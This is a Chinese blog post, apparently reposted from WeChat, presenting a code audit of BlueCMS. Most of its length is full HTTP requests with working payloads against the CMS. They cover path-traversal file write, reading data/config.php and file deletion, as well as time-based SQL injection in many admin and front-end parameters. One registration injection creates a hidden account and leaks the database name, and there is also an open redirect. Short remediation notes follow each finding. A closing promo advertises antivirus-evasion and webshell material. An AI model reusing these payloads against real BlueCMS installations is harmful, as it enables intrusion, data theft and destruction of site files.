0基础入门 | bluecms前后台代码审计
2023-12-17 23:59:33 Author: 渗透安全团队(查看原文) 阅读量:25 收藏

后台篇

  1. 新手学习代码审计,记录审计成长过程,先从简单入手。

1、后台系统设置-模板管理编辑提交处存在任意文件写入

漏洞条件

  1. 漏洞url:http://bulucms.com/admin/tpl_manage.php-[POST]:

  2. tpl_content=&tpl_name=../../../3.php&act=do_edit

  3. 漏洞参数:tpl_name

  4. 是否存在限制:无

  5. 是否还有其他条件:act=do_edit

复现

  1. 直接写一个php文件以及有危害的内容。(可实现跨目录写入)

  1. POST /admin/tpl_manage.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 72

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/admin/tpl_manage.php?act=edit&tpl_name=ann.htm

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=8jtsuca31sj4t3umsm7o1o6eg7; detail=4

  14. Connection: close

  15. tpl_content=&tpl_name=../../../3.php&act=do_edit

代码

  1. fopen( ,wb)如果文件存在直接写入,不存在就创建文件

修复建议

  1. 限制用户输入、严格控制文件系统权限、验证上传文件类型和重命名、遵循安全编码规范、定期监控和清理、记录上传活动

2、后台系统设置—模板管理—编辑存在任意文件读取

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/tpl_manage.php?act=edit&tpl_name=../../data/config.php

  2. 漏洞参数:tpl_name

  3. 是否存在限制:无

  4. 是否还有其他条件:act=edit

复现

  1. GET /admin/tpl_manage.php?act=edit&tpl_name=../../data/config.php HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/tpl_manage.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=jpimqam7eiq12p051tp1p0ua81

  10. Connection: close

代码

  1. fopen() 函数打开文件或者 URL。如果打开失败,本函数返回 FALSE

  2. get方式接受参数,接受一个文件没有过滤../,直接打开

修复建议

  1. 修复任意文件读取漏洞:严格限制用户输入、实施有效的文件路径验证、避免动态拼接用户输入构建文件路径、限制访问权限、定期检查和清理、记录文件访问活动。

3、后台信息管理处存在任意文件删除

漏洞条件

  1. 漏洞url:http://bulucms.com/admin/info.php?act=del_pic&id=../1.txt

  2. 漏洞参数:id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del_pic

复现

  1. GET /admin/info.php?act=del_pic&id=../1.txt HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/info.php?cid=3

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41

  10. Connection: close

代码

  1. $_REQUEST可以GET也可以POST,二选一。执行后页面不会显示,但是文件会被删除

修复建议

  1. 限制用户输入、验证和过滤文件路径、避免动态构建用户输入的删除路径、设置合适的文件权限、定期备份和监控文件删除活动。

4、后台友情链接处编辑存在任意文件删除

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/link.php-[POST]请求

  2. 漏洞参数:link_logo2

  3. 是否存在限制:无

  4. 是否还有其他条件:link_logo要为空

  1. POST /admin/link.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 876

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywwt1w9JpF4JwggpA

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/admin/link.php?act=edit&linkid=1

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41

  14. Connection: close

  15. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  16. Content-Disposition: form-data; name="link_name"

  17. sax

  18. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  19. Content-Disposition: form-data; name="link_site"

  20. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  21. Content-Disposition: form-data; name="link_logo"

  22. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  23. Content-Disposition: form-data; name="link_logo1"; filename=""

  24. Content-Type: application/octet-stream

  25. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  26. Content-Disposition: form-data; name="show_order"

  27. 0

  28. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  29. Content-Disposition: form-data; name="linkid"

  30. 1

  31. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  32. Content-Disposition: form-data; name="link_logo2"

  33. 1.txt

  34. ------WebKitFormBoundarywwt1w9JpF4JwggpA

  35. Content-Disposition: form-data; name="act"

  36. do_edit

  37. ------WebKitFormBoundarywwt1w9JpF4JwggpA--

代码

  1. 如果link_logo不为空就进入第一个if,否则else直接删除$_POST['link_logo2']接收到的文件

修复建议

  1. 限制用户输入、验证和过滤文件路径、避免动态构建用户输入的删除路径、设置合适的文件权限、定期备份和监控文件删除活动。

5、用户后台分类信息—发布分类信息存在任意文件删除

漏洞条件

  1. 漏洞url:http://bulucms.com/publish.php?act=del_pic&id=2.txt

  2. 漏洞参数:id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del_pic

复现

  1. GET /publish.php?act=del_pic&id=2.txt HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/publish.php?act=step2&cid=4

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41

  10. Connection: close

代码

  1. 接受id,判断文件是否存在,存在就直接删除

修复建议

  1. 限制用户输入、验证和过滤文件路径、避免动态构建用户输入的删除路径、设置合适的文件权限、定期备份和监控文件删除活动。

1、后台本地新闻处删除本地新闻存在sql注入

漏洞条件

  1. 漏洞url:http://bulucms.com/admin/article.php?act=del&id=(select*from(select%2bsleep(3)union/**/select%2b1)a)

  2. 漏洞参数:id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del

复现

  1. payload: (select*from(select+sleep(3)union/**/select+1)a)

  1. GET /admin/article.php?act=del&id=(select*from(select%2bsleep(3)union/**/select%2b1)a) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/index.php?act=menu

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=qlq28anq5pcbcprri2gg4fit92

  10. Connection: close

代码

  1. 133行的id是已经强制类型转换了,但是132行的id没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

2、后台系统设置-操作日志管理删除处存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/admin_log.php-[POST]:checkboxes%5B%5D=%28select%2Afrom%28select%2Bsleep%282%29union%2F%2A%2A%2Fselect%2B1%29a%29&act=del

  2. 漏洞参数:checkboxesact

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del

复现

  1. payload:(select*from(select+sleep(2)union/**/select+1)a)

  1. POST /admin/admin_log.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 99

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/admin/admin_log.php

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=qlq28anq5pcbcprri2gg4fit92

  14. Connection: close

  15. checkboxes%5B%5D=%28select%2Afrom%28select%2Bsleep%282%29union%2F%2A%2A%2Fselect%2B1%29a%29&act=del

代码

  1. $_POST['checkboxes']判断是数组就键值分离,将值带入sql语句执行,没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

3、后台常用操作—导航管理—编辑存在sql注入

漏洞条件

  1. 漏洞url:http://bulucms.com/admin/nav.php?act=edit&navid=1+or+sleep(0.5)

  2. 漏洞参数:navid

  3. 是否存在限制:无

  4. 是否还有其他条件:act=edit

复现

  1. GET /admin/nav.php?act=edit&navid=1+or+sleep(0.5) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/nav.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1

  10. Connection: close

代码

  1. 接受的navid变量是直接拼接在数据库接受的,输入什么就会直接拼接sql查询语句取数据库查,没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

3、后台分类信息—模型管理—删除处存在sql注入

漏洞条件

  1. 漏洞url:http://bulucms.com/admin/model.php?act=del&model_id=2+or+sleep(2)

  2. 漏洞参数:model_id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del

复现

  1. GET /admin/model.php?act=del&model_id=2+or+sleep(2) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/index.php?act=menu

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1

  10. Connection: close

代码

  1. 进入第三个条件语句,要让数据库里有数据才能删除成功,给model_id赋值

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

4、后台分类信息—附加属性管理—删除存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/attachment.php?act=del&att_id=2+or+sleep(2)

  2. 漏洞参数:att_id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=del

复现

  1. GET /admin/attachment.php?act=del&att_id=2+or+sleep(2) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/attachment.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=ppvkgqkq0f8o4er4e424b3e9h1

  10. Connection: close

代码

  1. 也是从拼接的sql语句里直接接受的参数变量没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

5、后台模块管理—广告管理—编辑存在sql注入

漏洞条件

  1. 漏洞url http://bulucms.com/admin/ad.php?act=edit&ad_id=3+or+sleep(0.5)

  2. 漏洞参数:ad_id

  3. 是否存在限制:无

  4. 是否还有其他条件:act=edit

复现

  1. GET /admin/ad.php?act=edit&ad_id=3+or+sleep(0.5) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/ad.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=bl3qc9geb0lfhf4luh19ngs7h3

  10. Connection: close

代码

  1. 103get接受参数ad_id。只判断是否存在值两边去除空没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

6、后台模块管理—电话广告位—编辑—提交更新存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/ad_phone.php-[POST]:content=mmm&title=qqq&color=ww&start_time=2023-11-24&end_time=&show_order=0&id=-1+or+sleep(4)&act=doedit

  2. 漏洞参数:id

  3. 是否存在限制:

  4. 是否还有其他条件:content=mmm&start_time=2023-11-24&end_time=&show_order=0&id=1&act=doedit

复现

  1. 测试payload:+AND+8861%3d(SELECT+(CASE+WHEN+(8861%3d8861)+THEN+8861+ELSE+(SELECT+7440+UNION+SELECT+9681)+END))--+aSdk

  2. 8861=8861相等返回正常

  1. POST /admin/ad_phone.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 104

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/admin/ad_phone.php?act=edit&id=1

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=bl3qc9geb0lfhf4luh19ngs7h3

  14. Connection: close

  15. content=mmm&title=qqq&color=ww&start_time=2023-11-24&end_time=&show_order=0&id=-1+or+sleep(4)&act=doedit

代码

  1. 只有id字段是直接post接受的而且是从sql语句中直接接受的,没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

7、后台模块管理—电话广告位—删除存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/ad_phone.php?act=del&id=1+or+sleep(1)

  2. 漏洞参数:id

  3. 是否存在限制:

  4. 是否还有其他条件:act=del

复现

  1. 测试payload:+or+sleep(1)

  1. GET /admin/ad_phone.php?act=del&id=1+or+sleep(1) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/ad_phone.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=bond49ch988jk55255s7082jg4

  10. Connection: close

代码

  1. 删除sql语句里直接用get方式接受没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

8、后台会员管理—会员列表—编辑和删除存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/admin/user.php?act=edit&user_id=1+or+sleep(1)

  2. 漏洞参数:user_id同一功能存在的漏洞参数一样

  3. 是否存在限制:

  4. 是否还有其他条件:act=edit

复现

  1. GET /admin/user.php?act=edit&user_id=2+or+sleep(2) HTTP/1.1

  2. Host: bulucms.com

  3. Upgrade-Insecure-Requests: 1

  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  6. Referer: http://bulucms.com/admin/user.php

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=0.9

  9. Cookie: PHPSESSID=jpimqam7eiq12p051tp1p0ua81

  10. Connection: close

代码

  1. sql语句里get方式接受user_id,没有任何过滤函数


post接受user_id值判断参数是否为空,没有过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

1、前端注册邮箱处存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/user.php-[POST]:referer=&user_name=fffff&pwd=1234567&pwd1=1234567&email=qq%40qqqq.com%df',1,1),(100,0x6162717765,md5(123456),(select+database()),1,1)%23&safecode=crht&from=&act=do_reg

  2. 漏洞参数:email

  3. 是否存在限制: safecode验证码需要随机

  4. 是否还有其他条件: referer=&user_name=fffff&pwd=1234567&pwd1=1234567&email=&safecode=crht&from=&act=do_reg

复现

  1. 插入添加用户密码,并且查询数据库语句。发送后用插入的账号密码就可以登录,并且在邮箱处会显示数据库名

  2. 0x6162717765-->账号:abqwe-->密码:123456

  3. payloadqq%40qqqq.com%df',1,1),(100,0x6162717765,md5(123456),(select+database()),1,1)%23

  1. POST /user.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 167

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/user.php?act=reg

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=ft01h5kv1trnm4p90sjgqoe336

  14. Connection: close

  15. referer=&user_name=fffff&pwd=1234567&pwd1=1234567&email=qq%40qqqq.com%df',1,1),(100,0x6162717765,md5(123456),(select+database()),1,1)%23&safecode=crht&from=&act=do_reg

代码

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

2、前端登录-密码存在sql注入

漏洞条件

  1. 漏洞url: http://bulucms.com/user.php?act=index_login-[POST]:user_name=abqwe&pwd=1%df')+AND+(SELECT+6025+FROM+(SELECT(SLEEP(1)))qlmz)--+XAAZ&x=12&y=22

  2. 漏洞参数:pwd

  3. 是否存在限制:

  4. 是否还有其他条件:act=index_loginuser_name存在。x=12&y=22

复现

  1. payload: %df') AND (SELECT 6025 FROM (SELECT(SLEEP(5)))qlmz)-- XAAZ

  1. POST /user.php?act=index_login HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 89

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/index.php

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=ft01h5kv1trnm4p90sjgqoe336; detail=1

  14. Connection: close

  15. user_name=abqwe&pwd=1%df')+AND+(SELECT+6025+FROM+(SELECT(SLEEP(1)))qlmz)--+XAAZ&x=12&y=22

代码

  1. $pwd变量整体是md5加密,没有在单引号内,也没有其他的过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

3、前端评论留言处存在sql注入

漏洞条件

  1. 漏洞url:http://bulucms.com/comment.php?act=send-[POST]:mood=6&comment=2w2&id=25&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB

  2. 漏洞参数:X-Forwarded-For

  3. 是否存在限制:需要伪造X-Forwarded-For

  4. 是否还有其他条件:comment不为空,act=send

复现

  1. payload1' AND (SELECT 6327 FROM (SELECT(SLEEP(5)))okFV) AND 'gXCg'='gXCg

  1. POST /comment.php?act=send HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 63

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/news.php?id=25

  11. X-Forwarded-For:127.0.0.1' AND (SELECT 6327 FROM (SELECT(SLEEP(1)))okFV) AND 'gXCg'='gXCg

  12. Accept-Encoding: gzip, deflate

  13. Accept-Language: zh-CN,zh;q=0.9

  14. Cookie: PHPSESSID=h1bk9mh2nr5erhnsshdbju0hs0

  15. Connection: close

  16. mood=6&comment=2w2&id=25&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB

代码

  1. 虽然一些参数被限制了,但在sql语句里直接获取真实ip没有任何过滤

修复建议

  1. 将用户输入的内容验证和过滤,使用预编译或转义函数。

4、前端注册处存在url跳转

漏洞条件

  1. 漏洞url: http://bulucms.com/user.php-[POST]:referer=&user_name=00000&pwd=098765&pwd1=098765&email=qq%40qqqq.com&safecode=bwvy&from=d3d3LmJhaWR1LmNvbQ==&act=do_login

  2. 漏洞参数:from

  3. 是否存在限制: from需要base64

  4. 是否还有其他条件:safecode验证码需要随机获取;act=do_login

复现

  1. POST /user.php HTTP/1.1

  2. Host: bulucms.com

  3. Content-Length: 120

  4. Cache-Control: max-age=0

  5. Upgrade-Insecure-Requests: 1

  6. Origin: http://bulucms.com

  7. Content-Type: application/x-www-form-urlencoded

  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

  10. Referer: http://bulucms.com/user.php?act=reg

  11. Accept-Encoding: gzip, deflate

  12. Accept-Language: zh-CN,zh;q=0.9

  13. Cookie: PHPSESSID=bfco4tm9tbkvjjg9vfm24ups41; detail=2

  14. Connection: close

  15. referer=&user_name=00000&pwd=098765&pwd1=098765&email=qq%40qqqq.com&safecode=bwvy&from=d3d3LmJhaWR1LmNvbQ==&act=do_login

  16. ``

代码

  1. $from变量不为空,将接受的变量base64编码。其他条件成立就会直接跳到传进来的值

修复建议

验证和过滤所有用户提供的重定向 URL,只允许合法的、事先定义好的目标地址。


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247512973&idx=1&sn=26b7c0e948db5976ff83907e4505d756&chksm=c095a8aa858f83b542934a93c7bdddf86ed6bce0b5731af402a3fa1392d8ddc4f001062289e1&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh